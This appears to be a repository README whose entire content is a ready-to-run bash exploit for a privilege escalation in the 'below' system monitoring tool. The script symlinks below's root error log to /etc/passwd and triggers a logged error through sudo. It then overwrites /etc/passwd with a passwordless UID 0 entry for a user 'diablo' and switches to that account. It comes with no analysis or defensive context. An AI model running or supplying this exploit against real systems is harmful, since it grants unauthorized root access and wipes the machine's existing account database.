README.md
Rendering markdown...
#!/bin/bash
# Exploit for Below privilege escalation
# Creates a root user 'diablo' via /var/log/below/error_root.log
# Temporary file
TMP_FILE="/tmp/fake_diablo_passwd"
echo "[*] Creating fake root user entry for 'diablo'..."
echo 'diablo::0:0:diablo:/root:/bin/bash' > "$TMP_FILE"
echo "[+] Temporary passwd file created at $TMP_FILE"
echo "[*] Removing original Below log file if it exists..."
rm -f /var/log/below/error_root.log
echo "[+] Removed old error_root.log"
echo "[*] Creating symlink from /var/log/below/error_root.log -> /etc/passwd..."
ln -s /etc/passwd /var/log/below/error_root.log
echo "[+] Symlink created"
echo "[*] Running Below to log error..."
sudo /usr/bin/below snapshot --begin veryfake &> /dev/null
echo "[+] Below triggered (error logged as 'running below to log error')"
echo "[*] Overwriting Below log with fake passwd entry..."
cp "$TMP_FILE" /var/log/below/error_root.log
echo "[+] Fake passwd entry applied"
echo "[*] Cleaning up temporary file..."
rm -f "$TMP_FILE"
echo "[+] Temporary file removed"
echo "[*] Switching to new root user 'diablo'..."
su diablo